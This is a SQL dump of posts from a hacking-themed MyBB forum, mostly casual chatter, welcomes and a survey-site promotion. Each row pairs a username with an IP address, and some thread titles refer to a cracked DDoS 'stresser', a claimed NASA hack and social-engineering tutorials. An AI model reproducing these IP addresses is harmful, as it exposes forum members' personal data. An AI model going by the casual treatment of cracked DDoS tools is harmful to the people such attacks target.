'VirtualLegend', '1350490871', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5008\' dateline=\'1350447588\']\r\nyes please i would really like one thanks so much:)\r\n[/quote]\r\n\r\nCheck your Inbox for your Signature\n[hr]\n[quote=\'D?ea\' pid=\'5109\' dateline=\'1350489888\']\r\nCan I get one please?\r\nIt could be awesome if it had a bit of \'nerd\' style over it ;)\r\n\r\n-THANKS!\r\n[/quote]\r\n\r\nI\'m Done with your Signature Check your Inbox', '83.83.167.183', '1397991351', '1', '0', '228', '1350493677', '1', 'ba2ff79ac54d86f68419acb404019837', '0', '0'); INSERT INTO mybb_posts VALUES('5111', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350494914', 'Ok I will add you......to the chat', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b70c198d638448461b31a8e7625c1a94', '0', '0'); INSERT INTO mybb_posts VALUES('5112', '916', '5066', '3', 'RE: Subject too long', '0', '222', 'Exposé', '1350495126', 'Lol iv\'e never gotten that error. Why not just pick a subject that is shorter?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ca4a2950db80cba113ced6b1d3a3658b', '0', '0'); INSERT INTO mybb_posts VALUES('5113', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '222', 'Exposé', '1350495167', 'Nice I should make a L33thacking one :P and give you guys em', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cccb56c28e79d2f8d8e7b41da38564b3', '0', '0'); INSERT INTO mybb_posts VALUES('5114', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350495568', 'Nice don\'t use it too much tho. Im integrating pastebin and pastie.org tonight when I get home', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '91966a7a3a63e3a27bfb8337df4ac478', '0', '0'); INSERT INTO mybb_posts VALUES('5115', '918', '5088', '65', 'RE: I feel famous', '0', '222', 'Exposé', '1350495806', 'Lol ok cool story bro.....nice vid :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9860fcb80b61b09a0d00b8aba4ba463d', '0', '0'); INSERT INTO mybb_posts VALUES('5116', '918', '5115', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350496013', '[quote=\'ƒ???????????g\' pid=\'5115\' dateline=\'1350495806\']\r\nLol ok cool story bro.....nice vid :P\r\n[/quote]\r\nThanks man ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '7e3871f9fb19f9388da4fa339570ba9f', '0', '0'); INSERT INTO mybb_posts VALUES('5117', '919', '5113', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350496125', '[quote=\'ƒ???????????g\' pid=\'5113\' dateline=\'1350495167\']\r\nNice I should make a L33thacking one :P and give you guys em\r\n[/quote]\r\nIf you pay, good idea! - haha.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '1320e5f46b1a02e8ccf6cc2db5c75f00', '0', '0'); INSERT INTO mybb_posts VALUES('5118', '920', '0', '49', '[IDEA] Award System', '12', '264', 'D?ea', '1350497366', '[align=center][b]I think we should get an award system here on L33THACKING.[/b]\r\n\r\n[i]Good idea or bad idea?[/i][/align]', '178.157.194.171', '-1298283861', '1', '0', '264', '1350497380', '1', 'dc9c876b3d5bca9e019f04a15e364189', '0', '1350497380'); INSERT INTO mybb_posts VALUES('5119', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '61', 'NXK', '1350498489', 'We\'ve already had it, But it was causing bugs since it\'s outdated.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5bde781a9a78d013a5d03936b13fd736', '0', '0'); INSERT INTO mybb_posts VALUES('5120', '921', '0', '4', 'Hey', '6', '270', 'LCS', '1350499559', 'Hello LH,\r\nVirtualLegend referred me so I thought I\'d give the forum ago. Looks pretty cool so far so I\'ll stay active, hope to meet some new people here and have some fun.\r\n\r\nNice to meet you all:angel:', '2.124.223.31', '41738015', '0', '0', '0', '0', '1', 'f12ebe69f56d7d1adf6a3de7b42cd486', '0', '0'); INSERT INTO mybb_posts VALUES('5121', '922', '0', '9', '???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350499669', '[align=center][url=https://efyu.net][img]http://www.efyu.net/signature/signature.png[/img][/url][/align]\r\n\r\n[b]On behalf[/b] of Myself & Narkose, I would love to introduce to you all [url=https://efyu.net]EFYU.net[/url] - the latest \'get-paid-to\' website. Our website is [b]100-hundred percent custom coded[/b], and is the most [b]secure network[/b] that offers our users protection [b](Full SSL Encryption)[/b] - guaranteed payments [b](Your earnings are safe!)[/b] and [b]the best paying offers[/b] on the whole web.\r\n\r\n[align=center][align=center][img]http://i.imgur.com/ALZA2.png[/img][/align][/align]\r\n\r\n[b]Contest:[/b] The first person to get 30 Active Referrals - (To count as active: they must have completed a minimum of 2 surveys) - will win $50 USD worth of vouchers. Start getting referrals now! The winner will be announced when someone hits that!\r\n\r\n[b]Please note:[/b] within the next week we expect to have over 1000+ worldwide surveys available to our users. Our current system/API allows us to add all CPA networks that we get accepted too.\r\n\r\n[u][b]Quick Links -[/b][/u]\r\n[list]\r\n[*][url=https://efyu.net/register.php]Register[/url]\r\n[*][url=https://efyu.net/faq.php]FAQ[/url]\r\n[*][url=https://efyu.net/voucher.php]Voucher Information[/url]\r\n[*][url=https://efyu.net/tos.php]Terms of Service[/url]\r\n[/list]\r\n\r\n[b][u]Main Features -[/u][/b]\r\n[list=1]\r\n[*]You\'ll get $0.20 free for registering. You\'ll only need to earn $2.80 (28 points) to cashout - it\'ll take 5 minutes to gain that many points. There are over 145 surveys available to US members.\r\n[*]You\'ll receive $0.10 each time you receive one of your referrals completes an offer. That\'s more than all of our competitors as of now. Our system will notify you via the dashboard on your number of referrals and how much your referrals have made you.\r\n[*]You\'ll receive free support. You can chat to a member of staff anytime via the dashboard - if we\'re online it\'ll tell you and you can request to have a live chat. You can also access complete 24/7 on our private forum - there\'s no need to register either, you\'ll automatically have an account created. Just login!\r\n[*]Everything\'s automatic - Complete a survey and you\'ll be credited your points within 60-seconds of completion - our API is fully functional and instant. You will be shown a \'Request Voucher\' button once you have earned 30 points ($3.00).\r\n[*]You can edit your account, password and emails. You can also use a different email than your main email to receive your vouchers. Oh, and we don\'t require our users to submit tedious tax forms to receive payments.\r\n[/list]\r\n\r\n[u][b]Signature(s) provided -[/b][/u]\r\n[img]http://www.efyu.net/signature/signature.png[/img]\r\n[code][url=http://www.efyu.net/?join=YourID][img]http://efyu.net/signature/signature.png[/img][/url][/code]\r\n\r\n[u][b]Live Support -[/b][/u]\r\n[url=http://efyu.kayako.com/visitor/index.php?/LiveChat/Chat/Request/_sessionID=ojgku63etquwp6v59e43p7mxf26xr8eo/_proactive=0/_filterDepartmentID=/_randomNumber=16/_fullName=/_email=/_promptType=chat]Click here to talk to an agent.[/url]', '2.124.223.31', '41738015', '0', '0', '0', '0', '1', '24b79b73effad136e630b2cd6676ebcc', '0', '0'); INSERT INTO mybb_posts VALUES('5122', '921', '5120', '4', 'RE: Hey', '0', '228', 'VirtualLegend', '1350499684', 'Welcome To L33thacking LCS\n\nStay Active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8f07da430618a8ca20ae6569ca2687bc', '0', '0'); INSERT INTO mybb_posts VALUES('5123', '920', '5119', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350499697', '[quote=\'NXK\' pid=\'5119\' dateline=\'1350498489\']\r\nWe\'ve already had it, But it was causing bugs since it\'s outdated.\r\n[/quote]\r\nJust use the newest version?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '63f2a4adb30afc1a8b4c11a49b3695b6', '0', '0'); INSERT INTO mybb_posts VALUES('5124', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '228', 'VirtualLegend', '1350499834', 'It\'s a very GOOD idea !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '782c1ad30d15d66ebc4ced6b9b4920b6', '0', '0'); INSERT INTO mybb_posts VALUES('5125', '921', '5120', '4', 'RE: Hey', '0', '264', 'D?ea', '1350499956', 'Welcome to our forum, remember to read the [url=http://l33thacking.net/misc.php?action=help]Help Desc[/url]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '653015123498db65975072d7614d6b9a', '0', '0'); INSERT INTO mybb_posts VALUES('5126', '921', '5120', '4', 'RE: Hey', '0', '222', 'Exposé', '1350499997', 'Welcome to LH broski. Hope you like the forum and stay active', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '63c4fe22729c05c3fa613a09c31ce03e', '0', '0'); INSERT INTO mybb_posts VALUES('5127', '920', '5124', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350499999', '[quote=\'VirtualLegend\' pid=\'5124\' dateline=\'1350499834\']\r\nIt\'s a very GOOD idea !!!\r\n[/quote]\r\nThanks mate.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'eb06d7ce918d177b39b7f4e70c0883b2', '0', '0'); INSERT INTO mybb_posts VALUES('5128', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '228', 'VirtualLegend', '1350500010', 'Nice thread I\'m gonna check it out for sure', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '36b4595d1193827bc0bd92c428b7bffb', '0', '0'); INSERT INTO mybb_posts VALUES('5129', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '270', 'LCS', '1350500067', 'That\'s great, are you going to use the video to monetize?', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'aaeca6ea827e0d8571b7a88de0c708bd', '0', '0'); INSERT INTO mybb_posts VALUES('5130', '921', '5120', '4', 'RE: Hey', '0', '270', 'LCS', '1350500109', 'Thanks everyone, I\'ll be active, I like the forum haha.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'c69af879ee1ae555b35013e61245d98b', '0', '0'); INSERT INTO mybb_posts VALUES('5131', '921', '5120', '4', 'RE: Hey', '0', '62', 'R?????zo?', '1350500156', 'Welcome to the community, stay active and HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eb85e1c49bca0b735e879757ff5d2c71', '0', '0'); INSERT INTO mybb_posts VALUES('5132', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '62', 'R?????zo?', '1350500192', 'Look pretty good bro, good job.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd1e40e31e576d5d2610c6168d8fc5fcd', '0', '0'); INSERT INTO mybb_posts VALUES('5133', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '62', 'R?????zo?', '1350500224', 'Yeah we had this and it was outdated, joker gave it a try but he could not fix it.\nMaybe someone else can :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '582764455b096a46ca6e9fd7e5bca319', '0', '0'); INSERT INTO mybb_posts VALUES('5134', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500255', 'I mean is it you jumping? :P\nOr just your channel.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '72abe799f0ebf75b744470f57054b1e4', '0', '0'); INSERT INTO mybb_posts VALUES('5135', '916', '5112', '3', 'RE: Subject too long', '0', '62', 'R?????zo?', '1350500400', '[quote=\'ƒ???????????g\' pid=\'5112\' dateline=\'1350495126\']\r\nLol iv\'e never gotten that error. Why not just pick a subject that is shorter?\r\n[/quote]\r\n\r\nIs not that, it\'s when you try to reply you can\'t do it by .Quick reply. since you have to remove the \"RE: \" that is posted by default when you reply.\r\n\r\njust go here http://l33thacking.net/thread-839.html and try to reply and you will see :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e98bb6c84e53f0eef6b7918bb8d71695', '0', '0'); INSERT INTO mybb_posts VALUES('5136', '922', '5128', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350500428', '[quote=\'VirtualLegend\' pid=\'5128\' dateline=\'1350500010\']\r\nNice thread I\'m gonna check it out for sure\r\n[/quote]\r\n\r\nThanks, it\'s a great website, you\'ll definately earn if you use it properly.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'f9d94c56cf5adfab44cdc9db3c490e3f', '0', '0'); INSERT INTO mybb_posts VALUES('5137', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '62', 'R?????zo?', '1350500448', 'Look like I\'m already in :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '60a4e79cf4a9c1ea164d65cadcd5a359', '0', '0'); INSERT INTO mybb_posts VALUES('5138', '920', '5133', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350500490', '[quote=\'R?????zo?\' pid=\'5133\' dateline=\'1350500224\']\r\nYeah we had this and it was outdated, joker gave it a try but he could not fix it.\r\nMaybe someone else can :)\r\n[/quote]\r\nI can fix it, if I gets a chance ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'a969113a527ae5a23434665af5b74a06', '0', '0'); INSERT INTO mybb_posts VALUES('5139', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350500540', 'Look promising. I\'m not in US though, will this work if I have a VPN?\nNice thread anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c4c85e30c2a441fd90189f9e79de4ce2', '0', '0'); INSERT INTO mybb_posts VALUES('5140', '897', '5132', '9', 'RE: YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350500543', '[quote=\'LCS\' pid=\'5129\' dateline=\'1350500067\']\r\nThat\'s great, are you going to use the video to monetize?\r\n[/quote]\r\nYes I am, I makes $$$ on it.\r\n\r\n[quote=\'R?????zo?\' pid=\'5132\' dateline=\'1350500192\']\r\nLook pretty good bro, good job.\r\n[/quote]\r\nThanks.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c9628c0940238d79c234ab8831446935', '0', '0'); INSERT INTO mybb_posts VALUES('5141', '918', '5134', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350500606', '[quote=\'R?????zo?\' pid=\'5134\' dateline=\'1350500255\']\r\nI mean is it you jumping? :P\r\nOr just your channel.\r\n[/quote]\r\nIt\'s \"just\", mine channel.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '756064c317ed1bd5055ef2c9882ae980', '0', '0'); INSERT INTO mybb_posts VALUES('5142', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '62', 'R?????zo?', '1350500607', 'That looks cool, do they ship worldwide? Any one knows?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1c5af21cce53eb21708d15d4db46a87c', '0', '0'); INSERT INTO mybb_posts VALUES('5143', '919', '5142', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350500667', '[quote=\'R?????zo?\' pid=\'5142\' dateline=\'1350500607\']\r\nThat looks cool, do they ship worldwide? Any one knows?\r\n[/quote]\r\nYes they do. They send by Regular Airmail.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '02f78ec19d4bf4087fe2c8c6e6008432', '0', '0'); INSERT INTO mybb_posts VALUES('5144', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500696', 'Yeah sorry I don\'t know who Felix Baumgartner is, I\'m not into that :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8cd7d332a83601852c3162e1a9c977c1', '0', '0'); INSERT INTO mybb_posts VALUES('5145', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '62', 'R?????zo?', '1350500726', 'How much are you making a month by the way? \nJust curious.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b761f6baf362811e643e83390abb8fbc', '0', '0'); INSERT INTO mybb_posts VALUES('5146', '918', '5144', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350500740', '[quote=\'R?????zo?\' pid=\'5144\' dateline=\'1350500696\']\r\nYeah sorry I don\'t know who Felix Baumgartner is, I\'m not into that :P\r\n[/quote]\r\nHe have been in the news every day the last week almost.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'edacc9b1e3af280b81f9fce9cee4f43e', '0', '0'); INSERT INTO mybb_posts VALUES('5147', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '62', 'R?????zo?', '1350500756', 'Talk to t3h jok3r, I\'d love my GFX award :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19a3e514ba57a46921bc35ea6eb17632', '0', '0'); INSERT INTO mybb_posts VALUES('5148', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '62', 'R?????zo?', '1350500796', 'Cool, I will wait for that version then.\nI will use it once in a while don\'t worry.\nHopefully we get more members :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '95035a414c676d51d57d74fe42f901db', '0', '0'); INSERT INTO mybb_posts VALUES('5149', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500837', 'Yeah but I don\'t watch that much televison also I\'m not from the US.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'abbd4d575c6a8cf3558dc7d6ba4adc58', '0', '0'); INSERT INTO mybb_posts VALUES('5150', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '62', 'R?????zo?', '1350500876', 'Cool I will make one then :D\nThanks for this.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c628cdf757a4582bcd0944725f0b0ea6', '0', '0'); INSERT INTO mybb_posts VALUES('5151', '897', '5145', '9', 'RE: YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350500988', '[quote=\'R?????zo?\' pid=\'5145\' dateline=\'1350500726\']\r\nHow much are you making a month by the way? \r\nJust curious.\r\n[/quote]\r\nIt\'s different, last month I made $35', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e4840852fcd377c5765bdb0296dd2138', '0', '0'); INSERT INTO mybb_posts VALUES('5152', '919', '5150', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350501141', '[quote=\'R?????zo?\' pid=\'5150\' dateline=\'1350500876\']\r\nCool I will make one then :D\r\nThanks for this.\r\n[/quote]\r\nGo for it ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '1474db0a83022c0080bbc6fa0c59b406', '0', '0'); INSERT INTO mybb_posts VALUES('5153', '918', '5149', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350501207', '[quote=\'R?????zo?\' pid=\'5149\' dateline=\'1350500837\']\r\nYeah but I don\'t watch that much televison also I\'m not from the US.\r\n[/quote]\r\nI\'m from Denmark, not US ;)\r\nHe is from Austria.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '88ee85752dcd4bcbaee3287cc881c14b', '0', '0'); INSERT INTO mybb_posts VALUES('5154', '920', '5147', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501252', '[quote=\'R?????zo?\' pid=\'5147\' dateline=\'1350500756\']\r\nTalk to t3h jok3r, I\'d love my GFX award :P\r\n[/quote]\r\nI\'m trying to contact him.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '607f423eb206992dee04afe2ef29ee3c', '0', '0'); INSERT INTO mybb_posts VALUES('5155', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '222', 'Exposé', '1350501303', 'I think we should definitely try to get the mod workin tho', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '44b33dc08a7de426bae3f17aebd7643d', '0', '0'); INSERT INTO mybb_posts VALUES('5156', '920', '5155', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501410', '[quote=\'ƒ???????????g\' pid=\'5155\' dateline=\'1350501303\']\r\nI think we should definitely try to get the mod workin tho\r\n[/quote]\r\nI have added Jok3r\'s skype, waiting for him to accept me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '0693e30cd9d06990e417bd4051727bbd', '0', '0'); INSERT INTO mybb_posts VALUES('5157', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '222', 'Exposé', '1350501469', 'Or you could just message him....he is also in the skype group :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '699abc8bf06483db916e1fda9fdc5480', '0', '0'); INSERT INTO mybb_posts VALUES('5158', '920', '5157', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501563', '[quote=\'ƒ???????????g\' pid=\'5157\' dateline=\'1350501469\']\r\nOr you could just message him....he is also in the skype group :P\r\n[/quote]\r\nI needs to talk private to him later in the future anyway.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '87c5855c51cdbb072967e7369581ae4a', '0', '0'); INSERT INTO mybb_posts VALUES('5159', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '82', 'iTzIpod', '1350501612', 'It was going to come out sometime next week or this week or last week..\nI forgot.\n\nBut\n\nNice idea :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1addbd3cef2a011deb6a4713578976cf', '0', '0'); INSERT INTO mybb_posts VALUES('5160', '920', '5159', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501808', '[quote=\'iTzIpod\' pid=\'5159\' dateline=\'1350501612\']\r\nIt was going to come out sometime next week or this week or last week..\r\nI forgot.\r\n\r\nBut\r\n\r\nNice idea :)\r\n[/quote]\r\nThanks ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '568526f7fa6af32fbcd46737c6842fa8', '0', '0'); INSERT INTO mybb_posts VALUES('5161', '922', '5139', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350501826', '[quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\']\r\nLook promising. I\'m not in US though, will this work if I have a VPN?\r\nNice thread anyways.\r\n[/quote]\r\n\r\nIt is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure.\r\n\r\nThanks! :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', '1e3a32c3c712ed620f555ce6c228c153', '0', '0'); INSERT INTO mybb_posts VALUES('5162', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350501878', 'I guess I live in a 3rd world country anyways :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b52bf6ee084e9f6b16d3ab1abcaac92e', '0', '0'); INSERT INTO mybb_posts VALUES('5163', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '222', 'Exposé', '1350501997', 'Nice I will check this out in a little bit....thanks', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '36eec180b1d1cc535eccac2e19c5de22', '0', '0'); INSERT INTO mybb_posts VALUES('5164', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '53', 'sirchamp', '1350502052', 'Am I missing something or am I not the only one who cant even log into this tool?', '91.115.176.210', '1534308562', '1', '0', '0', '0', '1', 'f1c3f8370576534d6cc4b2d9da9c849e', '0', '0'); INSERT INTO mybb_posts VALUES('5165', '918', '5162', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350502652', '[quote=\'R?????zo?\' pid=\'5162\' dateline=\'1350501878\']\r\nI guess I live in a 3rd world country anyways :P\r\n[/quote]\r\nYeah just might :P', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5959a10de067070031785ad15d4f4b75', '0', '0'); INSERT INTO mybb_posts VALUES('5166', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '257', 'XxTREYZxX', '1350502825', 'yeah this is a greaat idea, i would love my gamers award.', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '7640374d2fe49314d0d276db7d6435e9', '0', '0'); INSERT INTO mybb_posts VALUES('5167', '920', '5166', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350502850', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5166\' dateline=\'1350502825\']\r\nyeah this is a greaat idea, i would love my gamers award.\r\n[/quote]\r\nYeah ;)\r\nHope he will let me help.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c64acc3b4b686a06b1ff75807f92f86f', '0', '0'); INSERT INTO mybb_posts VALUES('5168', '894', '4958', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '264', 'D?ea', '1350503013', '[quote=\'Timmy\' pid=\'4958\' dateline=\'1350433231\']\r\nWhat\'s the difference between a stresser and a booter?\r\n[/quote]\r\nStresser sounds more sexy than booter.\r\nBut it\'s the same ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '895dadbb378625e4baaf4d808a36ff5c', '0', '0'); INSERT INTO mybb_posts VALUES('5169', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350503475', 'yeah that would be cool i might do that there is a 16% chance ill do that but thanks for the share', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2fe16278bca7a8d8c3258e41151cd1b5', '0', '0'); INSERT INTO mybb_posts VALUES('5170', '921', '5120', '4', 'RE: Hey', '0', '257', 'XxTREYZxX', '1350503568', 'welcome fellow person \nstay active and HQ please', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '1f368d5b1d5b2f10c24c87486c2801b5', '0', '0'); INSERT INTO mybb_posts VALUES('5171', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '257', 'XxTREYZxX', '1350503807', 'agree with virtual and iTzIpod', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'c4023ca1c733db9b6f8d43c0e8e1d1c4', '0', '0'); INSERT INTO mybb_posts VALUES('5172', '923', '0', '73', 'no more series', '0', '257', 'XxTREYZxX', '1350503923', 'i will no longer be doing the great app series anymore as because i got like 0 POST which is kinda sad i thought it would of been helpfull', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'd87ceeef1257d8dcd3e22472f1090479', '0', '0'); INSERT INTO mybb_posts VALUES('5173', '924', '0', '71', 'Ratchet and Clank @#$%^&^&*(', '0', '257', 'XxTREYZxX', '1350504088', 'hey l33T,\r\nhas anyone played ratchet and the clank, because i was playing with my brother and i\'v got to admit i was kinda fun:)\r\nso my ?ion who like this game!!!!!!!!', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b8ebe50cc763de222807f1edc819db33', '0', '0'); INSERT INTO mybb_posts VALUES('5174', '925', '0', '7', 'gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350504529', 'hey lH,\r\nand i just wanted to say the gaming thread is getting kinda boring because there is like no one active in the gaming section except me,\r\ni really think lh just advertise alot so that we get more members and more activity.OR come check out gaming section:)\r\nhope the gaming section become alive again thanks:)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'f06582282b9c236d155a4922f3d5f94d', '0', '0'); INSERT INTO mybb_posts VALUES('5184', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '228', 'VirtualLegend', '1350512597', 'It\'s not only the gaming section ! We need to get more Members !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6a6345bf85195dec84a9d197bf3e7ebb', '0', '0'); INSERT INTO mybb_posts VALUES('5185', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1350513217', 'No problem!\nGood luck everyone with their SEing experiences.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '13b630646a7cda9f67575f3238eeb736', '0', '0'); INSERT INTO mybb_posts VALUES('5183', '922', '5161', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350511669', '[quote=\'LCS\' pid=\'5161\' dateline=\'1350501826\']\n[quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\']\nLook promising. I\'m not in US though, will this work if I have a VPN?\nNice thread anyways.\n[/quote]\n\nIt is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure.\n\nThanks! :)\n[/quote]\n\nDoes not work with a VPN, and I use a paid one\n[spoiler]\n[img]http://i.imgur.com/pkLQC.png[/img]\n[/spoiler]', '149.255.32.228', '-1778442012', '1', '0', '62', '1350511697', '1', '6b0f1ae5e99dcfcb1bc9de2907975391', '0', '1350511697'); INSERT INTO mybb_posts VALUES('5182', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '61', 'NXK', '1350511242', 'Looks nice I guess, Hopefully it\'s legit.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e2a5ebec72fa6cd1cab9f44f84a746dc', '0', '0'); INSERT INTO mybb_posts VALUES('5181', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '61', 'NXK', '1350511183', 'I\'ve been meaning to do this, But I don\'t have tons of free time. Ill work on it when I can.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0666d1a1721091561e72364a71da23d', '0', '0'); INSERT INTO mybb_posts VALUES('5186', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350513381', 'yeah i agree virtual :)\nhopefully NXK can help us out', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'fa73ebab1e9c4c3d4eff5bbe19234918', '0', '0'); INSERT INTO mybb_posts VALUES('5187', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '222', 'Exposé', '1350516715', 'Well I just joined yesterday so I\'ll post some stuff', '66.87.30.33', '1113005601', '1', '0', '0', '0', '1', 'e02c9435e93c951b07e337e84b060856', '0', '0'); INSERT INTO mybb_posts VALUES('5188', '190', '665', 